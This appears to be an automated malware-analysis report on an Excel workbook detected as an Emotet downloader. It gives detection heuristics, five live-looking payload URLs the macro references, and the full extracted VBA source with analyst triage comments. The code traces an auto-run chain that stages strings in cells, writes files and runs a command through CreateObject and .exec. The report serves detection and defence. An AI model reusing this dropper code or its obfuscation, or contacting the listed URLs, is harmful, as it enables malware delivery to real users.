MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
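The file contains VBA macros, including a Workbook_Open event handler, that are designed to execute automatically. These macros reconstruct and download payloads from multiple URLs, indicating downloader functionality. The presence of 'CreateObject' and references to 'wscript.shell' further suggests execution of the downloaded content, likely second-stage malware. In the extracted source below, the names passed to CreateObject and the string passed to .exec are read from worksheet cells at run time, so they do not appear in the macro text itself.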
Heuristics 8
-
ClamAV: Doc.Downloader.EmotetExcel02222-9938901-0 | critical | CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.EmotetExcel02222-9938901-0
-
VBA macros detected | medium | 4 related findings | OLE_VBA_MACROS — Document contains VBA macro code
-
URL reconstructed from VBA cell-staged base64 dropper (5 URLs) | critical | OLE_VBA_CELL_DROPPER_URL — VBA reads worksheet cells, strips junk substrings via Replace(), and base64/UTF-16 decodes the result into a PowerShell EncodedCommand payload. The download URL is never contiguous in the file bytes; it was recovered by removing the macro's Replace() junk tokens from the cell strings and decoding the staged base64.
-
CreateObject call | high | OLE_VBA_CREATEOBJ — CreateObject call. Matched lines in script:
Set cbrcFonts = Application.CommandBars("Formatting").FindControl(ID:=1728)
Set FHdrthkl4yRtders.GSaEf34tsyrhd = FHdrthkl4yRtders.dghkqid.CreateObject(dsRtyejue57ykgf.gfhk2juskdjbg.Caption, "")
dsRtyejue57ykgf.gfhk2juskdjbg.Tag = Replace(Cells(100, 3), "oeir", "")
-
VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro | low | OLE_VBA_WBOPEN — Workbook_Open macro. Matched lines in script:
End Sub
Private Sub Workbook_Open()
Dim i As Long
-
Reference to Windows Script Host | high | SC_STR_WSCRIPT — Reference to Windows Script Host
-
Embedded URL | info | EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL
- https://store.uxdsummit.com/wp-admin/VfgBSQa7Z/ (Referenced by macro)
- https://glowrentals.com/wp-admin/f1zeAKGTnS6I/ (Referenced by macro)
- http://candisee.bminteractivegroup.com/1g94ngo/2n7lJoPuPDEanPcX/ (Referenced by macro)
- http://bachilleratoporciclos.org/wp-content/zR/ (Referenced by macro)
- http://formula8020.com/css/JCuR6OE404DgR/ (Referenced by macro)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12041 bytes |

SHA-256: df1eb14c222394595c0518b49eec2b55ed9573146c5f1717dedceddd2e199a2b
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ZsdaW356dufv"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ---- Module "ZsdaW356dufv" (attributes above) ----
' The VB_Base GUID {00020819-...} is the one Excel uses for the workbook (ThisWorkbook) document
' module, which is why the Workbook_Open procedure in this module is an auto-run event handler.
' Analyst reading order: Workbook_Open first, then FGshk4igHJdsfghhkdh; the other procedures in
' this module are not called from anywhere in this listing.
' Copies every cell comment on the active sheet into a newly added one-sheet workbook
' (cell address, formula and comment text, one row per commented cell).
' Triage note: no procedure in this listing calls this Sub, and it uses no file, CreateObject or
' exec call. Presumably it is generic spreadsheet utility code kept as padding around the
' dropper logic - treat it as low priority during analysis.
Sub Dgr547DSghwk4uhkdjsj()
Dim rgCells As Range
Dim intDefListCount As Integer
Dim strSheet As String
Dim strWorkBook As String
Dim intRow As Integer
Dim cell As Range
' SpecialCells raises an error when no cell has a comment; the error is suppressed so that
' rgCells simply stays Nothing and the guard below exits.
On Error Resume Next
Set rgCells = ActiveSheet.Cells.SpecialCells(xlComments)
On Error GoTo 0
If rgCells Is Nothing Then
MsgBox ".", vbInformation
Exit Sub
End If
strSheet = ActiveSheet.Name
strWorkBook = ActiveWorkbook.Name
' Temporarily force new workbooks to contain one sheet, add the workbook, then restore the setting.
intDefListCount = Application.SheetsInNewWorkbook
Application.SheetsInNewWorkbook = 1
Workbooks.Add
Application.SheetsInNewWorkbook = intDefListCount
ActiveWorkbook.Windows(1).Caption = "Comments for " & strSheet & _
" in " & strWorkBook
' Header row; the header texts are meaningless strings.
Cells(1, 1) = "bvnhdi"
Cells(1, 2) = "degfli"
Cells(1, 3) = ":"
Range(Cells(1, 1), Cells(1, 3)).Font.Bold = True
intRow = 2
For Each cell In rgCells
Cells(intRow, 1) = cell.Address(rowabsolute:=False, _
columnabsolute:=False)
Cells(intRow, 2) = " " & cell.Formula
Cells(intRow, 3) = cell.Comment.Text
intRow = intRow + 1
Next
End Sub
' Adds a temporary command bar named "vgjh", docked left, holding two buttons.
' Triage note: neither button is given an OnAction, so clicking them runs nothing, and no
' procedure in this listing calls this Sub. It has no part in the file-write / exec chain.
Sub FHsdrghkldsSeErhoihsw()
With Application.CommandBars.Add(Name:="vgjh", Temporary:=True, _
Position:=msoBarLeft)
With .Controls.Add(Type:=msoControlButton)
.Style = msoButtonWrapCaption
.Caption = "rtuo"
End With
With .Controls.Add(Type:=msoControlButton)
.Style = msoButtonIconAndWrapCaption
.Caption = "yher"
.FaceId = 225
End With
.Visible = True
End With
End Sub
' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened with macros enabled.
' Visible behaviour, in order: text staged in worksheet cells is cleaned with Replace(), written
' to two files whose paths also come from cells, and then the selection is moved to D1.
' NOTE(review): moving the selection presumably raises Worksheet_SelectionChange in the sheet
' module FHdrthkl4yRtders, which is where CreateObject and .exec are reached - confirm which
' sheet is active when the sample opens.
' Triage: the file paths and file contents are not in the macro text. Recover them from cells
' D101, D102, F97, F98 and J103 of the sample. The remaining statements do not affect that chain.
Private Sub Workbook_Open()
Dim i As Long
Dim c As Range, cc As Range: Dim iCommment As Comments: Set cc = Selection
' Cell D101 with the junk token "jqwi" removed is parked in a UserForm control's Tag.
dsRtyejue57ykgf.gfhk2juskdjbg.Tag = Replace(Cells(101, 4), "jqwi", "")
' Decoy: only fires for a selection of exactly 4829 rows by 2847 columns.
If cc.Rows.Count = 4829 And cc.Columns.Count = 2847 Then MsgBox "gf !", , "c"
' File write 1: path = cell D102, content = the Tag set above. The arguments "dfshk3", 2 and "."
' only feed the callee's return-value string handling, and the return value is discarded here.
FHdrthkl4yRtders.GswehlDRFa4whksdj "dfshk3", Cells(102, 4), 2, dsRtyejue57ykgf.gfhk2juskdjbg.Tag, "."
Set cc = Selection.SpecialCells(xlCellTypeVisible)
' Content for the second file: cell F98, a CR/LF, then cell F97.
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = Cells(98, 6) + vbCrLf & Cells(97, 6)
' Dead code: i is 0 here and is only incremented inside the branch, so i = 3682 never holds.
For Each c In cc
If Not c.Comment Is Nothing And i = 3682 Then
c.Value = c.Comment.Text: c.ClearComments:
i = i + 1
End If
Next
Dim strText As String: Dim bhfqakug As String
' File write 2: path = cell J103, content = the Caption built above.
FHdrthkl4yRtders.GswehlDRFa4whksdj "sdhjl3kjghkjg", Cells(103, 10), _
2, dsRtyejue57ykgf.gfhk2juskdjbg.Caption, "."
' strText is never assigned, so this comparison is always true and D1 is always selected.
If strText <> "fhk3 3g4kuesg" Then Range("D1").Select
' No-op: strText is empty, so the loop from Len(strText) down to 1 runs zero times.
For i = Len(strText) To 1 Step -1
bhfqakug = bhfqakug & Mid(strText, i, 1)
Next i
End Sub
' Adds a temporary popup menu to the first command bar, with one button and a nested popup
' holding two more buttons.
' Triage note: the OnAction values are "1", "2" and "3", which are not names of any procedure
' in this listing, and nothing in this listing calls this Sub. It has no part in the
' file-write / exec chain.
Sub GawethkjHdeghwkjdshkjg()
With Application.CommandBars(1).Controls.Add(Type:=msoControlPopup, _
Temporary:=True)
.Caption = "Jsdehjlekih uh"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 280
.Caption = "hswe54ye"
.OnAction = "1"
End With
With .Add(Type:=msoControlPopup)
.Caption = "xbvjhv21kj"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 1643
.Caption = "UDRy4"
.OnAction = "2"
End With
With .Add(Type:=msoControlButton)
.FaceId = 1000
.Caption = "jur4"
.OnAction = "3"
End With
End With
End With
End With
End With
End Sub
' Second stage of the execution chain; called from Worksheet_SelectionChange in module
' FHdrthkl4yRtders. Three statements matter: the Caption assignment from cell G103, the
' CreateObject method call that stores an object in GSaEf34tsyrhd, and the Tag assignment
' from cell C100. The call to Gaserhkl3jdHSdrete then runs .exec on that object with the Tag.
' Triage: the object name (G103) and the command string (C100, with the junk token "oeir"
' removed) live in worksheet cells, not in this source. Dump those cells to see what is run.
' The command-bar code around these statements has no effect on the chain.
Sub FGshk4igHJdsfghhkdh()
Dim cbrcFonts As CommandBarControl
Dim cbrBar As CommandBar: Dim i As Integer: Dim dkqw As String
' The UserForm control's Caption is reused as a scratch string for the object name.
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = Cells(103, 7)
Set cbrcFonts = Application.CommandBars("Formatting").FindControl(ID:=1728)
' dghkqid was set by gherthkSSHDFh4etdskk; its CreateObject method is called with the name from G103.
' NOTE(review): the report's SC_STR_WSCRIPT finding suggests a Windows Script Host object is
' involved here - confirm from the cell contents.
Set FHdrthkl4yRtders.GSaEf34tsyrhd = FHdrthkl4yRtders.dghkqid.CreateObject(dsRtyejue57ykgf.gfhk2juskdjbg.Caption, "")
' Command string: cell C100 with every "oeir" removed, parked in the control's Tag.
dsRtyejue57ykgf.gfhk2juskdjbg.Tag = Replace(Cells(100, 3), "oeir", "")
If cbrcFonts Is Nothing Then
Set cbrBar = Application.CommandBars.Add
Set cbrcFonts = cbrBar.Controls.Add(ID:=1728)
End If
' This call is where .exec happens; the Range argument only feeds the callee's decoy textbox logic.
FHdrthkl4yRtders.Gaserhkl3jdHSdrete Range("F240:G350"), False
' Dead code: dkqw is never assigned, so it can never equal "ek2".
If dkqw = "ek2" Then
For i = 0 To cbrcFonts.ListCount - 1
Cells(i + 1, 1) = cbrcFonts.List(i + 1)
Next i
On Error Resume Next
cbrBar.Delete
End If
End Sub
Attribute VB_Name = "FHdrthkl4yRtders"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ---- Module "FHdrthkl4yRtders" (attributes above) ----
' The VB_Base GUID {00020820-...} is the one Excel uses for a worksheet document module, so
' Worksheet_SelectionChange in this module is an event handler for that sheet.
' Module-level state follows. Only the two Object variables are used by the code in this listing.
' ashfkaw, BdsgAewrt4sf, Sdfa3gkjsedf and f2qgja are not referenced anywhere else in it.
Public ashfkaw As Integer
' First object: assigned by CreateObject in gherthkSSHDFh4etdskk; its CreateObject method is
' later called from ZsdaW356dufv.FGshk4igHJdsfghhkdh.
Public dghkqid As Object
Public BdsgAewrt4sf As Double
Public Sdfa3gkjsedf, f2qgja As String
' Second object: assigned in ZsdaW356dufv.FGshk4igHJdsfghhkdh; Gaserhkl3jdHSdrete calls its exec method.
Public GSaEf34tsyrhd As Object
' Builds a temporary custom menu bar with nested popups and buttons.
' Triage note: this Sub relies on names that are not defined anywhere in this listing
' (DeleteCustomMenu, strMenuName, cbrcBar, and the OnAction targets CallMenu1, CallMenu2,
' MenuOnOff, CallSubMenu1, CallSubMenu2, CallLastMenu1, CallLastMenu2), and nothing in this
' listing calls it. Presumably it is copied menu-sample code kept as padding. It has no part in
' the file-write / exec chain.
Sub ghRsREaTweyrdhsds()
Dim cbrMenu As CommandBar
Dim cbrcMenu As CommandBarControl
Dim cbrcSubMenu As CommandBarControl
DeleteCustomMenu
Set cbrMenu = Application.CommandBars.Add(strMenuName, msoBarTop, _
True, True)
' Top-level popup on the new bar.
Set cbrcMenu = cbrMenu.Controls.Add(msoControlPopup, , , , True)
With cbrcMenu
.Caption = "&"
End With
With cbrcMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "&1"
.OnAction = "CallMenu1"
End With
With cbrcMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "2"
.OnAction = "CallMenu2"
End With
' First nested popup.
Set cbrcSubMenu = cbrcMenu.Controls.Add(Type:=msoControlPopup, _
Temporary:=True)
With cbrcSubMenu
.Caption = "tgw1"
.BeginGroup = True
End With
With cbrcMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "s/wr2"
.OnAction = "MenuOnOff"
.Style = msoButtonIconAndCaption
.FaceId = 463
End With
With cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "1"
.OnAction = "CallSubMenu1"
.Style = msoButtonIconAndCaption
.FaceId = 2950
.State = msoButtonDown
End With
Set cbrcBar = cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
With cbrcBar
.Caption = "2"
.OnAction = "CallSubMenu2"
.Enabled = False
End With
' Second nested popup, created inside the first one; cbrcSubMenu is re-pointed to it.
Set cbrcSubMenu = cbrcSubMenu.Controls.Add(Type:=msoControlPopup, _
Temporary:=True)
With cbrcSubMenu
.Caption = "1"
.BeginGroup = True
End With
With cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "1"
.OnAction = "CallLastMenu1"
.Style = msoButtonIconAndCaption
.FaceId = 71
.State = msoButtonDown
End With
With cbrcSubMenu.Controls.Add(Type:=msoControlButton, _
Temporary:=True)
.Caption = "2"
.OnAction = "CallLastMenu2"
.Style = msoButtonIconAndCaption
.FaceId = 72
.Enabled = True
End With
cbrMenu.Visible = True
Set cbrcSubMenu = Nothing
Set cbrcMenu = Nothing
Set cbrMenu = Nothing
End Sub
' Clears the sheet and lists every command bar, one per row: index, name, a label chosen by bar
' type, and the BuiltIn flag.
' Triage note: nothing in this listing calls this Sub. Note that Cells.Clear would wipe the
' worksheet cells that the execution chain reads its strings from, which is a further hint that
' this procedure is padding rather than part of the chain.
Sub Gasrhk4jsTGHJdfstlskjh()
Dim intRow As Integer
Dim cbrBar As CommandBar
Cells.Clear
intRow = 1
For Each cbrBar In CommandBars
Cells(intRow, 1) = cbrBar.Index
Cells(intRow, 2) = cbrBar.Name
' The type labels are meaningless strings.
Select Case cbrBar.Type
Case msoBarTypeNormal
Cells(intRow, 3) = "cbqwkhj3 fdef"
Case msoBarTypeMenuBar
Cells(intRow, 3) = "gfs4 edrf"
Case msoBarTypePopup
Cells(intRow, 3) = "gsw tyhey5y"
End Select
Cells(intRow, 4) = cbrBar.BuiltIn
intRow = intRow + 1
Next
End Sub
' Execution point of the macro chain. The signature imitates a worksheet event handler
' (Target, Cancel), but in this listing it is called directly from
' ZsdaW356dufv.FGshk4igHJdsfghhkdh.
' The one statement that matters is the .exec call: it invokes the exec method of the object
' held in GSaEf34tsyrhd with the string held in the UserForm control's Tag (set by the caller
' from cell C100).
' NOTE(review): if that object is a Windows Script Host shell, as the report's SC_STR_WSCRIPT
' finding suggests, this starts a child process of Excel - confirm from the cell contents.
' For detection, process-creation telemetry with Excel as the parent is the relevant surface.
Sub Gaserhkl3jdHSdrete(ByVal Target As Range, Cancel As Boolean)
Static intCount As Integer
Dim x As Integer, y As Integer
Cancel = True
x = Target.Left
y = Target.Top
' Cancel remains True only when Target.Left equals 30543; the textbox branch below depends on it.
If x <> 30543 Then Cancel = False
intCount = intCount + 1
' Runs whatever command string is staged in the Tag.
GSaEf34tsyrhd.exec dsRtyejue57ykgf.gfhk2juskdjbg.Tag
' Cover behaviour: drops a call-counter textbox on the sheet, only in the Cancel = True case.
If Cancel = True Then _
ActiveSheet.Shapes.AddTextbox(msoTextOrientationHorizontal, _
x, y, 35, 20).TextFrame.Characters.Text = intCount
End Sub
' Sheet event handler: Excel raises it whenever the selection on this worksheet changes.
' NOTE(review): Workbook_Open ends with Range("D1").Select, which presumably is what raises
' this event right after the file is opened - confirm.
' Chain-relevant statements: the Caption assignment from cell G100, the call to
' gherthkSSHDFh4etdskk (which passes that Caption to CreateObject), and the final call to
' ZsdaW356dufv.FGshk4igHJdsfghhkdh. The colour-checking loops in between never execute.
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Dim intRow, dhcMinRow, dhcMaxRow As Integer: Dim intCol As Integer: Dim cell As Range: Dim fTop As Boolean
Dim fBottom As Boolean: Dim fLeft As Boolean: Dim fRight As Boolean: dhcMinRow = 2:
Dim intDigit, dhcMinCol, dhcMaxCol As Integer: dhcMinCol = 3: dhcMinCol = 3: dhcMaxRow = 4
' Object name for the first CreateObject call, read from cell G100.
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = Cells(100, 7)
' The bare identifier at the end of the next line is a call to gherthkSSHDFh4etdskk.
intDigit = 1: dhcMaxCol = 3: gherthkSSHDFh4etdskk
' Dead code: the outer loop runs for row 2 only, and the inner loop runs from column 3 to
' column 2, i.e. zero times, so the body, including the On Error Resume Next, is never reached.
For intRow = dhcMinRow To dhcMaxRow - 2
For intCol = dhcMinCol To dhcMaxCol - 1
Set cell = Cells(intRow, intCol)
If cell.Interior.ColorIndex = 35 Then
fLeft = False
fRight = False
fTop = False
fBottom = False
On Error Resume Next
fTop = cell.Offset(-1, 0).Interior.ColorIndex = 35
fBottom = cell.Offset(1, 0).Interior.ColorIndex = 35
fLeft = cell.Offset(0, -1).Interior.ColorIndex = 35
fRight = cell.Offset(0, 1).Interior.ColorIndex = 35
End If
Next intCol
Next intRow
' Clears the scratch Caption, then hands over to the stage that creates the second object and
' reaches .exec.
dsRtyejue57ykgf.gfhk2juskdjbg.Caption = "": ZsdaW356dufv.FGshk4igHJdsfghhkdh
End Sub
' Creates the first COM object of the chain. The only effective statement is the CreateObject
' call, which stores its result in the module-level variable dghkqid.
' The object name comes from the UserForm control's Caption, which the caller
' (Worksheet_SelectionChange) fills from cell G100 immediately before calling this Sub.
' Triage: the name is not in the macro text; read cell G100 of the sample to identify the object.
' The input-validation loop is a decoy: strInput is "" so the first statement in the loop exits
' the Sub, and the final Range("A1") read is unreachable.
Sub gherthkSSHDFh4etdskk()
Dim intMin As Integer, intMax As Integer
Dim strInput As String
Dim strMessage As String
Dim intValue As Integer
strMessage = "df " & intMin & " |k " & intMax: strInput = ""
Set dghkqid = CreateObject(dsRtyejue57ykgf.gfhk2juskdjbg.Caption)
intMin = 1: intMax = 50
Do
' Always taken on the first pass, because strInput was set to "" above.
If strInput = "" Then Exit Sub
If IsNumeric(strInput) Then
intValue = CInt(strInput)
If intValue >= intMin And intValue <= intMax Then
Exit Do
End If
End If
strMessage = "dsfk wergki27uetiqwu." & vbNewLine & _
"swd " & intMin & " , " & intMax
Loop
strInput = ActiveSheet.Range("A1").Value
End Sub
' Counts case-insensitive occurrences of Search in each item of Text, accumulating into the
' undeclared variable CoincideCount (vbNull is the VarType constant with value 1).
' Triage note: the function name is never assigned, so the function returns nothing useful, and
' no procedure in this listing calls it. It has no part in the file-write / exec chain.
Function Fshkfokiuh2qw3qa(Text, Search)
' Reject array, error and empty search values.
If IsArray(Search) = True Then Exit Function
If IsError(Search) = True Then Exit Function
If IsEmpty(Search) = True Then Exit Function
For Each iCell In Text
If Not IsError(iCell) Then
iText = LCase(iCell)
iSearch = LCase(Search)
iLen = Len(Search)
iNumber = InStr(iText, iSearch)
' Step past each match and look for the next one.
While iNumber > 0
iNumber = InStr(iNumber + iLen, iText, iSearch)
CoincideCount = CoincideCount + vbNull
Wend
End If
Next
End Function
' File-write primitive presented as a "get the n-th item of a delimited string" helper.
' Effective behaviour: opens the path in sfhksk for output (creating or truncating it), writes
' the string fgjeorih to it with Print #, and closes it.
' Parameters:
'   strTextIn, strSeparator - used only for the string result computed at the end.
'   sfhksk   - path of the file to write; Workbook_Open passes cell D102 and cell J103.
'   intItem  - checked for < 1, then overwritten with 1, so the loop body runs exactly once.
'   fgjeorih - content written to the file.
' Returns a substring of strTextIn; both callers in this listing discard it.
' For detection, the relevant surface is file creation by the Excel process shortly after a
' document is opened. The paths themselves must be recovered from the worksheet cells.
Function GswehlDRFa4whksdj(ByVal strTextIn As String, ByVal sfhksk As String, intItem As _
Integer, ByVal fgjeorih As String, strSeparator As String) As String
Dim intStart As Integer
Dim intEnd As Integer
Dim i As Integer: i = 1
If intItem < 1 Then Exit Function
' i is 1 here, so the file is opened as file number #1.
Open sfhksk For Output As #i
If strSeparator = " " Then strTextIn = Application.Trim(strTextIn)
intItem = 1
' The content is routed through a second UserForm control's Tag before being written.
dsRtyejue57ykgf.dgsskl3jsklkdh.Tag = fgjeorih
If Right(strTextIn, Len(strTextIn)) <> strSeparator Then _
strTextIn = strTextIn & strSeparator
' Single pass (intItem is 1), so i stays 1 and refers to the file number opened above.
For i = 1 To intItem
intStart = intEnd + 1
Print #i, dsRtyejue57ykgf.dgsskl3jsklkdh.Tag
intEnd = InStr(intStart, strTextIn, strSeparator)
' Junk constant check; if it ever matched, the function would exit without closing the file.
If (intEnd = 3492) Then
Exit Function
End If
Close #i
Next i
GswehlDRFa4whksdj = Mid(strTextIn, intStart, intEnd - intStart)
End Function
Attribute VB_Name = "dsRtyejue57ykgf"
Attribute VB_Base = "0{9B965126-5FD5-4552-8446-5178B2AF2FA2}{B55186F7-AA12-4681-B7AD-2FC6EF46A4B0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' ---- Module "dsRtyejue57ykgf" (attributes above) ----
' The two-GUID VB_Base form is what a UserForm designer module carries. No code follows in this
' listing. The other modules use two of its controls, gfhk2juskdjbg and dgsskl3jsklkdh, only as
' string holders via their Tag and Caption properties. NOTE(review): the form appears never to be
' shown; check the form's stored control properties in the sample for further staged strings.